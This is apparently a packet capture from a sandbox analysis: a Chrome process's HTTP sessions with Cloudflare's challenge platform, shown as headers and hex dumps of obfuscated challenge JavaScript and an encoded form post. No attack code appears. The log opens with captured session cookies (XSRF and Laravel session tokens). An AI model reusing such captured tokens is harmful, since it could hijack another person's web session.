                                                                                                    Cookie: XSRF-TOKEN=eyJpdiI6IlI1R25VOC9CSGRXZDRGb3ZJQndzM3c9PSIsInZhbHVlIjoiOWJrTkRYZVpZQzlhUGFBaXRneFdYWFNJK0wrOGJoSUhiaDlkVktoekNwcm41YVVtd2lJZk5hQ1loeFpsMU5rczM0UEdUN0RCMXZXM2xnVVJzenNweTM3VERFdFBFekVtZHhPQ1NtZFdCTFVLdDhSNDR2dTVRNnVwbldDc1U2NGIiLCJtYWMiOiI4M2Y3NWI3NWZhZTAzM2E5MTk3OTQzMTFlN2I0MjBkNDMzMWU4MWJjN2UyMmI0MWJmMzBjNGFlZjUxMTZlYjRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImN1bGl5MWhtdlJCc3BhWjR0aXVId0E9PSIsInZhbHVlIjoiMEgvRVVDYS9IbXhTVlVIUUlhUVkvUHZVRi96Tm9DUFVrY1IvcEVMZEh6TXh1eVFmSlRSMzFuT2lwVllwWGhHWWZJQzNocHpZbGRzZGtFVDZNWVplQ0NHYVdRSUMvSVJQVEdmbkgzVm9CQStmWWdMUWs3QUgvaGpPRDZKc2x0cTgiLCJtYWMiOiJhNGFiODIxYTllNzNkOGViYjhjZWNmNWMwYTEwN2FlM2RlOTczY2RhODVkZjZmNDQ2OThlNDUwNjYxZmNiOTJhIiwidGFnIjoiIn0%3D
                                                                                                    2024-12-23 18:11:48 UTC1069INHTTP/1.1 404 Not Found
                                                                                                    Date: Mon, 23 Dec 2024 18:11:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=14400
                                                                                                    Age: 6980
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rl4SCA2DgqObEAwkj5k9HaCD8EW8bHJ3xyOFNTqDT%2FNg9JQ%2Bor16T2JwBe9kyrBUbCv%2FLpc56GGESLnoFo1betBslpfCZl7rdJ2tZra7ks274WpHMjHVziqSc53KkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Vary: Accept-Encoding
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1357&rtt_var=779&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2126&delivery_rate=2098747&cwnd=252&unsent_bytes=0&cid=7f2833ac079263d0&ts=19&x=0"
                                                                                                    CF-Cache-Status: HIT
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50f5284cb9c5-EWR
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2560&min_rtt=2097&rtt_var=1117&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1895&delivery_rate=1392465&cwnd=141&unsent_bytes=0&cid=67fcde2775eb8cd1&ts=10413&x=0"
                                                                                                    2024-12-23 18:11:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.549732104.18.95.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:49 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:49 UTC240INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:49 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    cache-control: max-age=2629800, public
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50f97afd8c93-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.549734104.18.95.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:49 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6a50df68a942a0&lang=auto HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:50 UTC331INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:49 GMT
                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                    Content-Length: 125254
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50fd5dbac40e-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:50 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c
                                                                                                    Data Ascii: ort%20has%20been%20successfully%20submitted","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available",
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 2c 67 38 2c 67 39 2c 67 7a 2c 67 41 2c 67 42 2c 67 46 2c 67 47 2c 67 48 2c 67 36 2c 67 37 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 30 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 38 32 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 32 38 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 33 36 36 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 35 37 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 34 31 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 38 37 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                                                    Data Ascii: ,g8,g9,gz,gA,gB,gF,gG,gH,g6,g7){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1130))/1+parseInt(gI(1782))/2+-parseInt(gI(1028))/3*(parseInt(gI(366))/4)+-parseInt(gI(1757))/5+parseInt(gI(841))/6+-parseInt(gI(1587))/7+parseInt(gI(
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 7b 69 3d 28 67 4e 3d 67 4a 2c 7b 27 45 53 48 4e 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 4a 4a 75 4d 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 6e 7a 6a 43 50 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 76 64 4d 44 43 27 3a 67 4e 28 31 33 36 33 29 2c 27 74 66 6b 52 72 27 3a 67 4e 28 31 33 38 39 29 2c 27 46 70 4d 51 6c 27 3a 67 4e 28 31 32 34 36 29 2c 27 6f 79 58 61 4d 27 3a 67 4e 28 35 32 30 29 2c 27 46 63 4e 41 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 7d 29 3b 74 72 79 7b 69 66 28 6a 3d 69 5b 67 4e 28 31 34 36 30 29 5d 28 65 4f 2c 66 5b 67 4e 28 36 35 36 29 5d
                                                                                                    Data Ascii: {i=(gN=gJ,{'ESHNl':function(E,F,G){return E(F,G)},'JJuMn':function(E,F){return E+F},'nzjCP':function(E,F){return E+F},'vdMDC':gN(1363),'tfkRr':gN(1389),'FpMQl':gN(1246),'oyXaM':gN(520),'FcNAJ':function(E,F){return E+F}});try{if(j=i[gN(1460)](eO,f[gN(656)]
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 72 65 74 75 72 6e 20 73 3e 76 7d 2c 67 3d 66 2c 67 5b 67 4f 28 35 38 34 29 5d 28 65 2c 45 72 72 6f 72 29 29 3f 28 68 3d 65 5b 67 4f 28 35 34 32 29 5d 2c 65 5b 67 4f 28 36 31 32 29 5d 26 26 67 5b 67 4f 28 31 33 38 32 29 5d 28 74 79 70 65 6f 66 20 65 5b 67 4f 28 36 31 32 29 5d 2c 67 5b 67 4f 28 31 31 39 38 29 5d 29 29 26 26 28 67 4f 28 31 32 37 32 29 3d 3d 3d 67 4f 28 31 34 36 32 29 3f 67 5b 67 4f 28 31 36 35 34 29 5d 28 67 4f 28 31 35 31 37 29 2c 66 75 6e 63 74 69 6f 6e 28 67 50 2c 76 29 7b 28 67 50 3d 67 4f 2c 6b 5b 67 50 28 31 37 30 35 29 5d 29 26 26 28 76 3d 7b 7d 2c 76 5b 67 50 28 34 35 31 29 5d 3d 67 5b 67 50 28 35 30 39 29 5d 2c 76 5b 67 50 28 31 37 39 33 29 5d 3d 6f 5b 67 50 28 35 36 37 29 5d 5b 67 50 28 31 31 33 33 29 5d 2c 76 5b 67 50 28 31 30 35
                                                                                                    Data Ascii: return s>v},g=f,g[gO(584)](e,Error))?(h=e[gO(542)],e[gO(612)]&&g[gO(1382)](typeof e[gO(612)],g[gO(1198)]))&&(gO(1272)===gO(1462)?g[gO(1654)](gO(1517),function(gP,v){(gP=gO,k[gP(1705)])&&(v={},v[gP(451)]=g[gP(509)],v[gP(1793)]=o[gP(567)][gP(1133)],v[gP(105
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 3d 3d 3d 66 7d 2c 27 68 6f 4b 64 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 4e 51 43 79 47 27 3a 68 42 28 35 38 36 29 2c 27 63 42 68 6c 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 28 67 29 7d 7d 2c 65 3d 63 5b 68 42 28 31 34 30 38 29 5d 2c 65 26 26 64 5b 68 42 28 31 37 36 37 29 5d 28 65 5b 68 42 28 34 35 31 29 5d 2c 68 42 28 35 30 31 29 29 26 26 64 5b 68 42 28 31 30 32 33 29 5d 28 65 5b 68 42 28 31 30 35 32 29 5d 2c 64 5b 68 42 28 39 39 36 29 5d 29 3f 66 72 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 52 28 29 7d 2c 31 65 33 29 3a 65 26 26 65 5b 68 42 28 34 35 31 29 5d 3d 3d 3d 68 42 28 35 30 31
                                                                                                    Data Ascii: on(f,g){return g===f},'hoKdN':function(f,g){return f===g},'NQCyG':hB(586),'cBhlM':function(f,g){return f(g)}},e=c[hB(1408)],e&&d[hB(1767)](e[hB(451)],hB(501))&&d[hB(1023)](e[hB(1052)],d[hB(996)])?fr=setInterval(function(){fR()},1e3):e&&e[hB(451)]===hB(501
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 5d 28 69 56 28 36 37 35 29 2c 69 56 28 36 37 35 29 29 29 63 5b 65 5b 69 56 28 36 31 39 29 5d 5d 5b 69 56 28 31 37 35 35 29 5d 26 26 28 68 3d 7b 7d 2c 68 5b 69 56 28 34 35 31 29 5d 3d 69 56 28 35 30 31 29 2c 68 5b 69 56 28 31 37 39 33 29 5d 3d 6a 5b 69 56 28 35 36 37 29 5d 5b 69 56 28 31 31 33 33 29 5d 2c 68 5b 69 56 28 34 31 38 29 5d 3d 69 56 28 31 32 30 30 29 2c 68 5b 69 56 28 31 30 35 32 29 5d 3d 65 5b 69 56 28 34 34 33 29 5d 2c 69 5b 69 56 28 31 37 30 35 29 5d 5b 69 56 28 31 37 35 35 29 5d 28 68 2c 27 2a 27 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 67 35 28 63 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 67 33 28 65 5b 69 56 28 36 36 31 29 5d 28 67 34 2c 63 29 29 7d 7d 2c 67 36 3d 5b 5d 2c 67 37 3d 30 3b 32 35 36 3e 67 37 3b 67 36 5b 67 37
                                                                                                    Data Ascii: ](iV(675),iV(675)))c[e[iV(619)]][iV(1755)]&&(h={},h[iV(451)]=iV(501),h[iV(1793)]=j[iV(567)][iV(1133)],h[iV(418)]=iV(1200),h[iV(1052)]=e[iV(443)],i[iV(1705)][iV(1755)](h,'*'));else return g5(c)}catch(h){return g3(e[iV(661)](g4,c))}},g6=[],g7=0;256>g7;g6[g7
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 69 29 7d 2c 27 67 4e 4e 65 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 41 79 52 58 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 6d 4e 42 76 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 67 67 68 63 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6e 61 69 66 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 57 49 5a 79 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 66 4b 56 4a 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69
                                                                                                    Data Ascii: i)},'gNNej':function(h,i){return h!=i},'AyRXA':function(h,i){return i*h},'mNBvp':function(h,i){return h<i},'gghcX':function(h,i){return i==h},'naifA':function(h,i){return h(i)},'WIZyD':function(h,i){return i===h},'fKVJx':function(h,i){return h==i}},e=Stri
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 42 3d 62 43 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 62 71 3d 62 72 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 62 39 3d 6a 5b 6a 7a 28 33 32 38 29 5d 28 62 61 28 62 62 2c 32 29 2c 62 63 28 62 64 2c 31 33 29 29 5e 6a 5b 6a 7a 28 33 36 33 29 5d 28 62 65 2c 62 66 2c 32 32 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 33 27 3a 69 66 28 31 36 3e 61 77 29 6f 3d 61 78 5b 61 79 2b 61 7a 5d 3b 65 6c 73 65 20 66 6f 72 28 73 3d 6a 5b 6a 7a 28 31 34 37 31 29 5d 5b 6a 7a 28 36 36 35 29 5d 28 27 7c 27 29 2c 78 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 73 5b 78 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 42 3d 6a 5b 6a 7a 28 33 32 38 29 5d 28 6a 5b 6a 7a 28 31 36 39 39 29 5d 28 6a 5b 6a 7a 28 31 31 36 33 29 5d 28 62 4f 2c 42 2c 37
                                                                                                    Data Ascii: B=bC;continue;case'11':bq=br;continue;case'12':b9=j[jz(328)](ba(bb,2),bc(bd,13))^j[jz(363)](be,bf,22);continue;case'13':if(16>aw)o=ax[ay+az];else for(s=j[jz(1471)][jz(665)]('|'),x=0;!![];){switch(s[x++]){case'0':B=j[jz(328)](j[jz(1699)](j[jz(1163)](bO,B,7
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 28 31 36 2c 73 29 3b 48 3d 48 3c 3c 31 7c 64 5b 6a 44 28 38 34 34 29 5d 28 4d 2c 31 29 2c 64 5b 6a 44 28 35 36 39 29 5d 28 49 2c 64 5b 6a 44 28 38 38 32 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 44 28 31 33 31 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 6a 44 28 38 30 30 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 4d 26 31 2e 30 36 7c 48 3c 3c 31 2e 35 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 44 28 31 33 31 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 44 3d 3d 30 26
                                                                                                    Data Ascii: (16,s);H=H<<1|d[jD(844)](M,1),d[jD(569)](I,d[jD(882)](j,1))?(I=0,G[jD(1311)](o(H)),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[jD(800)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=M&1.06|H<<1.5,I==j-1?(I=0,G[jD(1311)](o(H)),H=0):I++,M>>=1,s++);C=(D--,D==0&


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.549735104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:49 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 3241
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:49 UTC3241OUTData Raw: 76 5f 38 66 36 61 35 30 64 66 36 38 61 39 34 32 61 30 3d 72 68 52 36 39 36 43 36 59 36 50 36 6f 36 70 6c 32 78 6c 32 58 69 51 58 51 46 61 74 51 61 32 51 69 24 46 42 51 59 24 32 56 6c 32 24 42 64 32 75 7a 36 42 55 49 58 7a 55 39 67 68 51 6a 32 44 69 43 42 32 33 43 36 32 2d 4c 32 61 77 4d 32 74 6e 69 32 46 52 67 36 56 7a 32 4d 36 43 39 6e 32 6f 6c 55 43 32 59 32 61 64 32 75 32 24 63 33 77 39 69 32 68 4f 43 59 4c 55 61 65 50 4d 4b 41 67 4e 39 74 37 55 6e 2d 73 61 2d 36 31 46 72 7a 32 58 36 43 65 32 51 52 24 5a 6e 54 7a 54 43 64 32 70 4e 49 41 59 61 68 52 2d 64 59 67 74 46 4f 43 47 49 62 55 35 32 51 56 51 77 67 64 4f 61 44 74 32 44 58 6b 32 43 54 42 6d 72 55 43 32 43 52 43 32 30 77 41 33 2d 64 32 35 36 43 71 25 32 62 4b 69 32 71 41 71 74 32 2d 52 6c 32 2b 70
                                                                                                    Data Ascii: v_8f6a50df68a942a0=rhR696C6Y6P6o6pl2xl2XiQXQFatQa2Qi$FBQY$2Vl2$Bd2uz6BUIXzU9ghQj2DiCB23C62-L2awM2tni2FRg6Vz2M6C9n2olUC2Y2ad2u2$c3w9i2hOCYLUaePMKAgN9t7Un-sa-61Frz2X6Ce2QR$ZnTzTCd2pNIAYahR-dYgtFOCGIbU52QVQwgdOaDt2DXk2CTBmrUC2CRC20wA3-d256Cq%2bKi2qAqt2-Rl2+p
                                                                                                    2024-12-23 18:11:50 UTC747INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:50 GMT
                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                    Content-Length: 149624
                                                                                                    Connection: close
                                                                                                    cf-chl-gen: Qu6tFjfJCqBHzRBarQXcO5LtxXC47K2id5s2+0EPRpM9djIUTVK4I9pYDA/cZuO95krPcUTItLqg0hcMjzRmSDmt4X6rgk0NlSEBtFcY1DaCgyI1vX+ZSnwlnz9PnwJlrmqcRJnk6KkTUwNeq+ePCxQaMyLP5AhziJJ+M08vawwox/1ZXc3dZGYPe/JrqCN47J+MR8dAcUmzjA5a6aIeelYN4tpghfp1JpewsgQKhb0rbDByOgiuzp0+iOu0BxtCvbiIn2XS73kV90UqsP2YPDl4Keoppgdj8sUtBxV3SCwfvCvRwcD4rx1eqMswkQEI1J9xWK/yp7J7nn+F6hrkCiN3MyGwKrxRaR7TsWuvmwKMHiWpFlyKyffKreeuXjoTXF+HxThFgSKyJmOB1IMS2OQAmOoZTzbID+ICIFDZf5driG/GcpERYNSOocxVMyYwR1IP7Ig398uLnkea7kPbRuxFhSEXKqcEsOnNX4IHiE0LfMY=$IHZnHfQwzX/3hQMV
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50fd8ff98c96-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:50 UTC622INData Raw: 6d 48 71 44 6b 34 75 4b 6e 49 71 61 6a 48 72 45 6d 4c 71 33 6b 59 47 4b 71 71 54 4e 79 49 57 76 30 61 72 45 71 5a 47 6d 78 74 50 4f 71 39 71 58 32 61 7a 66 34 4b 48 66 6e 70 79 35 77 72 44 48 75 74 33 41 31 2b 4f 70 38 4e 7a 76 36 39 47 77 39 4f 37 55 34 74 62 43 30 38 66 46 31 4f 33 33 74 2b 33 31 38 39 4c 68 32 38 44 66 2b 73 72 4a 34 41 38 4f 45 75 6e 65 32 38 76 39 44 42 6e 68 47 77 55 56 35 52 38 4b 2b 76 67 67 44 76 49 50 33 76 6f 54 39 68 58 6a 33 53 59 73 42 41 34 72 49 68 34 72 43 53 67 49 4d 44 6f 78 39 79 30 49 4e 66 73 34 51 44 63 5a 4d 69 4d 54 4a 68 73 34 51 6a 52 4a 53 53 38 4d 43 6b 59 78 44 45 70 42 52 53 49 78 49 69 5a 5a 46 7a 41 71 4b 43 77 33 4b 31 46 61 4e 6a 56 6d 52 56 35 41 5a 47 73 70 52 47 35 47 5a 30 73 77 52 31 31 57 59 6d 31
                                                                                                    Data Ascii: mHqDk4uKnIqajHrEmLq3kYGKqqTNyIWv0arEqZGmxtPOq9qX2azf4KHfnpy5wrDHut3A1+Op8Nzv69Gw9O7U4tbC08fF1O33t+3189Lh28Df+srJ4A8OEune28v9DBnhGwUV5R8K+vggDvIP3voT9hXj3SYsBA4rIh4rCSgIMDox9y0INfs4QDcZMiMTJhs4QjRJSS8MCkYxDEpBRSIxIiZZFzAqKCw3K1FaNjVmRV5AZGspRG5GZ0swR11WYm1
